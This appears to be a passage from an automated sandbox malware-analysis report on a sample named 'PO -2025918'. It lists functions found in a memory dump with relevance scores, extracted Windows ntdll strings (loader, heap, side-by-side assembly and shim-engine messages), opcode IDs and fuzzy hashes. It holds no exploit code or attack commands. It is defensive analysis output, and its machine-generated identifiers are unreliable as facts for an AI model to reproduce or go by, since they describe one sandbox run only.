                                                                                                                            • Instruction Fuzzy Hash: FD027FF1D002299BDB35DB54CC84BEAB7B8AF54704F0141EAE649A7281EB709F84CF59
                                                                                                                            Function 01C38B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                            • API String ID: 0-2515994595
                                                                                                                            • Opcode ID: 0f1009c865cd6e542267900c67fa85b3644fcb502a6b244ab5f6927d8ec0dea2
                                                                                                                            • Instruction ID: 8383ced95863f59dfb3b7cf0aa5d857400d1051d839897712e30eb4b44be9ba5
                                                                                                                            • Opcode Fuzzy Hash: 0f1009c865cd6e542267900c67fa85b3644fcb502a6b244ab5f6927d8ec0dea2
                                                                                                                            • Instruction Fuzzy Hash: 5B51EF711143029BC729DF199848BABBBECFFE4644F140A6DB999C3240EB74D604CBD2
                                                                                                                            Function 01C40274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                            • API String ID: 0-1700792311
                                                                                                                            • Opcode ID: a8e80ca95a2979fc011de78f80f46cf31569416d39f03d5314002ee1f2f22cb9
                                                                                                                            • Instruction ID: e8ea38ea817d91cf3bd23d41a7cb2c193a65abc912b0e5e3e79f434190b40d08
                                                                                                                            • Opcode Fuzzy Hash: a8e80ca95a2979fc011de78f80f46cf31569416d39f03d5314002ee1f2f22cb9
                                                                                                                            • Instruction Fuzzy Hash: 11D1DF31548682DFDB2AEF69C440BEDBBF1FF55A10F088099FA469B262C734DA50CB54
                                                                                                                            Function 01C189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • VerifierDebug, xrefs: 01C18CA5
                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01C18A3D
                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01C18A67
                                                                                                                            • HandleTraces, xrefs: 01C18C8F
                                                                                                                            • VerifierDlls, xrefs: 01C18CBD
                                                                                                                            • VerifierFlags, xrefs: 01C18C50
                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01C18B8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                            • API String ID: 0-3223716464
                                                                                                                            • Opcode ID: 1fa9fc077ac23f08435e5b51f91abf0979d3d32be68ad54ad917e675cb64d7f4
                                                                                                                            • Instruction ID: c8084cc7dc8a0a0d83623560ba5816fd0a18006d2d4b750103f4f87f42bc91e5
                                                                                                                            • Opcode Fuzzy Hash: 1fa9fc077ac23f08435e5b51f91abf0979d3d32be68ad54ad917e675cb64d7f4
                                                                                                                            • Instruction Fuzzy Hash: 3E916872688312DFD725EF6C88D0B6BB7A4BBA2B14F440498FA416B258C770DD00E791
                                                                                                                            Function 01B9EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                            • API String ID: 0-1109411897
                                                                                                                            • Opcode ID: 4851bc49cedff7061c70d878356124b27da456ab60c8789793f76e0d42e20957
                                                                                                                            • Instruction ID: 26828d4f09e9fd4f8779fd03fa8b3247cbc659f9686b29bc258f6fc5ffa67634
                                                                                                                            • Opcode Fuzzy Hash: 4851bc49cedff7061c70d878356124b27da456ab60c8789793f76e0d42e20957
                                                                                                                            • Instruction Fuzzy Hash: 87A24774A0562A8FDF68DF19C8887AABBB5EF49314F1442EDD90DA7250DB309E85CF40
                                                                                                                            Function 01BC63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-792281065
                                                                                                                            • Opcode ID: 2c5c3e0ba6436bff21825142210f1b747aa2a005a1d1738e533352c9df9fa70d
                                                                                                                            • Instruction ID: 9895a95d3c295e1e2566c94086c3bddb2d51bcb8db4871cfc14bc0436e926c3c
                                                                                                                            • Opcode Fuzzy Hash: 2c5c3e0ba6436bff21825142210f1b747aa2a005a1d1738e533352c9df9fa70d
                                                                                                                            • Instruction Fuzzy Hash: 1B912570B00355DBEB2EDF58D985BAEBBA1AB60F14F1401ADEA116B3C5D7B0C842C791
                                                                                                                            Function 01B8645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01BE99ED
                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01BE9A2A
                                                                                                                            • apphelp.dll, xrefs: 01B86496
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BE9A11, 01BE9A3A
                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01BE9A01
                                                                                                                            • LdrpInitShimEngine, xrefs: 01BE99F4, 01BE9A07, 01BE9A30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-204845295
                                                                                                                            • Opcode ID: aa81adcc3b8c399ebec3373b0cda1dc713cfcf2dcb1608e4a37e981af55bd13d
                                                                                                                            • Instruction ID: 195d35943195385f2b4f978d2d6e52d2637bc5caad90277b6311f14bc08ffa87
                                                                                                                            • Opcode Fuzzy Hash: aa81adcc3b8c399ebec3373b0cda1dc713cfcf2dcb1608e4a37e981af55bd13d
                                                                                                                            • Instruction Fuzzy Hash: DB51C6712083059FDB29EF24D885BAB77E8FF94B48F00199DF596972A0D730E944CB92
                                                                                                                            Function 01BCC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • LdrpInitializeProcess, xrefs: 01BCC6C4
                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01C08170
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BCC6C3
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01C08181, 01C081F5
                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 01C081E5
                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 01C08177, 01C081EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                            • API String ID: 0-475462383
                                                                                                                            • Opcode ID: a2f9b5466c52d05e6390eeba685d1b3918c28b713a7c20554d06bc03eaceeab2
                                                                                                                            • Instruction ID: e7d3743779c317f4b37df200dabe6ec17f894dc890795ba35be3105854b48dd4
                                                                                                                            • Opcode Fuzzy Hash: a2f9b5466c52d05e6390eeba685d1b3918c28b713a7c20554d06bc03eaceeab2
                                                                                                                            • Instruction Fuzzy Hash: DE3127716443429BC718EF28DD86E2A7BD4EFA4F14F0105ACF945AB2A1E760EC04D7A2
                                                                                                                            Function 01BC2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01C0219F
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01C02178
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01C021BF
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01C02165
                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01C02160, 01C0219A, 01C021BA
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01C02180
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                            • API String ID: 0-861424205
                                                                                                                            • Opcode ID: 6e7b8014b6eb57095862e908b25456876ce84dde9824e70149127436850890ab
                                                                                                                            • Instruction ID: a24fc4e2f7048b9271820c0d2f44302e9465c475abcc5d64710cc94f876fcd89
                                                                                                                            • Opcode Fuzzy Hash: 6e7b8014b6eb57095862e908b25456876ce84dde9824e70149127436850890ab
                                                                                                                            • Instruction Fuzzy Hash: 88310836B40225F7F7269A9ACC89F5A7A78DB55E50F0500EDBA04A7150D770DE01C6A1
                                                                                                                            Function 01BD096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 01BD2DF0: LdrInitializeThunk.NTDLL ref: 01BD2DFA
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0BA3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0BB6
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0D60
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0D74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1404860816-0
                                                                                                                            • Opcode ID: b971810df2776cbe57afdf8bccdf693e0e87a5ccaea39663542b8f866e2de943
                                                                                                                            • Instruction ID: 9a16246bf18d1039bb610f060b6582d78cdcdd634bc4b449edb683f67ae3b326
                                                                                                                            • Opcode Fuzzy Hash: b971810df2776cbe57afdf8bccdf693e0e87a5ccaea39663542b8f866e2de943
                                                                                                                            • Instruction Fuzzy Hash: C9424A71900715DFDB29CF28C880BAAB7F5BF44314F1445AAE989DB242E770EA84CF60
                                                                                                                            Function 01B9A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                            • API String ID: 0-379654539
                                                                                                                            • Opcode ID: b5dff80e5986f82255f426474691b79580b1c7b8bdafe23cfd669693e7d8bec7
                                                                                                                            • Instruction ID: ba54961468d9fc6c4db80cea6551386ac596a7daeed3d96f7768aee042476e7c
                                                                                                                            • Opcode Fuzzy Hash: b5dff80e5986f82255f426474691b79580b1c7b8bdafe23cfd669693e7d8bec7
                                                                                                                            • Instruction Fuzzy Hash: 9AC17B742083828FDB19CF68C044B6ABBE4FF85704F0489ADF9958B351E734D94ACB52
                                                                                                                            Function 01BC8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • LdrpInitializeProcess, xrefs: 01BC8422
                                                                                                                            • @, xrefs: 01BC8591
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BC8421
                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01BC855E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-1918872054
                                                                                                                            • Opcode ID: bd4fb3bebf37c6fbdee81592f97d372a5f62bd10bb09ddf8b4c6f42e589a9e68
                                                                                                                            • Instruction ID: 264abf69ab7ad9995306493ea100ea809773714c7e4f3fefbcfaa123ffb13717
                                                                                                                            • Opcode Fuzzy Hash: bd4fb3bebf37c6fbdee81592f97d372a5f62bd10bb09ddf8b4c6f42e589a9e68
                                                                                                                            • Instruction Fuzzy Hash: 67917E71608345AFDB29DF65CC80FABBAECFF94A44F4009AEFA84D2151E374D9448B52
                                                                                                                            Function 01BC273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01C022B6
                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01C021D9, 01C022B1
                                                                                                                            • .Local, xrefs: 01BC28D8
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01C021DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                            • API String ID: 0-1239276146
                                                                                                                            • Opcode ID: 723e301c50223bfb2fe7fc4034217ce196633db8b3804f88203ade7fcbbe6ca9
                                                                                                                            • Instruction ID: ef42f2a5b5b10ade09cf6800c91033580ceee573d276c13a6a112b06b56aee04
                                                                                                                            • Opcode Fuzzy Hash: 723e301c50223bfb2fe7fc4034217ce196633db8b3804f88203ade7fcbbe6ca9
                                                                                                                            • Instruction Fuzzy Hash: 8EA19C35900229DBDB29CFA8C888BA9B7B5BF58754F1541EED908A7291D770DE80CF90
                                                                                                                            Function 01BC4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01C03456
                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01C03425, 01C03432, 01C03451
                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01C0342A
                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01C03437
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                            • API String ID: 0-1245972979
                                                                                                                            • Opcode ID: df94d64dadff2719442e89340833ee74e9e2ba3c1a45c0990accde20af5e9d40
                                                                                                                            • Instruction ID: ef7e2c217c52bb2b6b830ca42dac0510aab7f7c907a49d7e89e64cb64903a753
                                                                                                                            • Opcode Fuzzy Hash: df94d64dadff2719442e89340833ee74e9e2ba3c1a45c0990accde20af5e9d40
                                                                                                                            • Instruction Fuzzy Hash: 53612236600B529FD72B8F1DC891B2ABBE5FF80B10F1585ADE8559F290C730EA01CB91
                                                                                                                            Function 01B964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01BF10AE
                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01BF0FE5
                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01BF1028
                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01BF106B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                            • API String ID: 0-1468400865
                                                                                                                            • Opcode ID: 3dbf4951a564455eb8e551205e30685bb0205571f49aee32b528e84107daf3e0
                                                                                                                            • Instruction ID: 5faeb32420b40f285279f21de167cbaaa1e91d4e85e739f69f7c10f9c486064d
                                                                                                                            • Opcode Fuzzy Hash: 3dbf4951a564455eb8e551205e30685bb0205571f49aee32b528e84107daf3e0
                                                                                                                            • Instruction Fuzzy Hash: 007101B19043099FCF25EF28C884B9B7FA8EF55764F4044A8F9488B296D334D589CBD2
                                                                                                                            Function 01BB245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • apphelp.dll, xrefs: 01BB2462
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BFA9A2
                                                                                                                            • LdrpDynamicShimModule, xrefs: 01BFA998
                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01BFA992
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-176724104
                                                                                                                            • Opcode ID: ef7525bc88ff9fa4428885431f05fd29932d114656c8f3a844fd0256dd5eea4c
                                                                                                                            • Instruction ID: b8614fba66de28d8e2183bfc6593b3184da54a2d5ac6731621ce8f317b066100
                                                                                                                            • Opcode Fuzzy Hash: ef7525bc88ff9fa4428885431f05fd29932d114656c8f3a844fd0256dd5eea4c
                                                                                                                            • Instruction Fuzzy Hash: 94313975610201EBDB3D9F69C8C1B6E7BB4FB94B00F1640EDEA066B254D7B0E849C740
                                                                                                                            Function 01BA29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01BA327D
                                                                                                                            • HEAP: , xrefs: 01BA3264
                                                                                                                            • HEAP[%wZ]: , xrefs: 01BA3255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                            • API String ID: 0-617086771
                                                                                                                            • Opcode ID: bd8006f3fbcb841b282e12aad222d313a1f06bb5298b61257502bad783346cc8
                                                                                                                            • Instruction ID: a31c3ffe944a39a1f19fc621f0b0ef93bc425cea6b746a83856317fef4ee4150
                                                                                                                            • Opcode Fuzzy Hash: bd8006f3fbcb841b282e12aad222d313a1f06bb5298b61257502bad783346cc8
                                                                                                                            • Instruction Fuzzy Hash: CE92AD71A082499FDB29CF68C4447ADBBF1FF08300F5881EAE999AB361D735A945CF50
                                                                                                                            Function 01BA0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-4253913091
                                                                                                                            • Opcode ID: 6cdf17589c0df0a25a017c8fee6dd4622a191a6c158bedfb033a4beac2317a94
                                                                                                                            • Instruction ID: 88138cfc860f6fcf17fdc3eacb8fcd0e727b87058ac6d022ac7c1d93066ce0ae
                                                                                                                            • Opcode Fuzzy Hash: 6cdf17589c0df0a25a017c8fee6dd4622a191a6c158bedfb033a4beac2317a94
                                                                                                                            • Instruction Fuzzy Hash: 61F1CD34A04606DFEB29DF68C894B6ABBF5FF44700F5482E8E5069B391D734E985CB90
                                                                                                                            Function 01BB6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $@
                                                                                                                            • API String ID: 0-1077428164
                                                                                                                            • Opcode ID: ca1846c0a7452863396389ea3477e11d0285c386157407965f4812068401c7fe
                                                                                                                            • Instruction ID: 10307c8e4cc01fb975f497de32ac0e47cc29969c3754980c1a72ca24cc2a682f
                                                                                                                            • Opcode Fuzzy Hash: ca1846c0a7452863396389ea3477e11d0285c386157407965f4812068401c7fe
                                                                                                                            • Instruction Fuzzy Hash: 45C270716083459FDB29CF29C880BBBBBE5EFC8704F0489ADEA8987641D774D844CB52
                                                                                                                            Function 01B8A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                            • API String ID: 0-2779062949
                                                                                                                            • Opcode ID: c32bf59a08128598b1d4dafa74348e809f1a4449affa9c11ed92ff768956c888
                                                                                                                            • Instruction ID: abc4e379b9defbf98564fb3d2a81aae318f42d2a47178f4f5cec830117b9eacc
                                                                                                                            • Opcode Fuzzy Hash: c32bf59a08128598b1d4dafa74348e809f1a4449affa9c11ed92ff768956c888
                                                                                                                            • Instruction Fuzzy Hash: 5CA16E719016299BDF39DF28CC88BEABBB8EF44700F1001EAD909A7250E7759E84CF50
                                                                                                                            Function 01BB0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 01BFA10F
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BFA121
                                                                                                                            • LdrpCheckModule, xrefs: 01BFA117
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
